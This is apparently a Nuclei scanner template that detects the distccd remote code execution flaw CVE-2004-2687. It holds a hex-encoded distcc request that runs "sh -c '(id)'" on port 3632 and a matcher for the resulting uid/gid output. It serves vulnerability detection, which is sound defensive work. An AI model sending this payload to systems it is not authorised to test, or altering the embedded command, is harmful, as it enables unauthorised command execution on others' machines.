43 lines
1.7 KiB
YAML
43 lines
1.7 KiB
YAML
id: CVE-2004-2687
|
|
|
|
info:
|
|
name: Distccd v1 - Remote Code Execution
|
|
author: pussycat0x
|
|
severity: high
|
|
description: |
|
|
distcc 2.x, as used in XCode 1.5 and others, when not configured to restrict access to the server port, allows remote attackers to execute arbitrary commands via compilation jobs, which are executed by the server without authorization checks.
|
|
reference:
|
|
- http://distcc.samba.org/security.html
|
|
- http://lists.samba.org/archive/distcc/2004q3/002550.html
|
|
- http://lists.samba.org/archive/distcc/2004q3/002562.html
|
|
- https://github.com/crypticdante/distccd_rce_CVE-2004-2687
|
|
- https://github.com/gwyomarch/Lame-HTB-Writeup-FR
|
|
classification:
|
|
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:C/I:C/A:C
|
|
cvss-score: 9.3
|
|
cve-id: CVE-2004-2687
|
|
cwe-id: CWE-16
|
|
epss-score: 0.94037
|
|
epss-percentile: 0.99194
|
|
cpe: cpe:2.3:a:apple:xcode:1.5:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
tags: cve,cve2004,network,rce,distccd
|
|
|
|
tcp:
|
|
- inputs:
|
|
- data: 444953543030303030303031
|
|
type: hex
|
|
- data: 41524743303030303030303841524756303030303030303273684152475630303030303030322d634152475630303030303030637368202d6320272869642927415247563030303030303031234152475630303030303030322d634152475630303030303030366d61696e2e634152475630303030303030322d6f4152475630303030303030366d61696e2e6f444f5449303030303030303141
|
|
type: hex
|
|
host:
|
|
- "{{Hostname}}"
|
|
port: 3632
|
|
|
|
matchers:
|
|
- type: regex
|
|
part: raw
|
|
regex:
|
|
- "uid=[0-9]+.*gid=[0-9]+.*"
|
|
# digest: 4b0a00483046022100b45186a7e92c5e3e180db442d003fe428573fe4630b6cf6391a20d7ccf17a93d022100f779f2f93c2389060483b2da27e867762fa80aa55615d1169ddab65ed40ff6c5:922c64590222798bb761d5b6d8e72950 |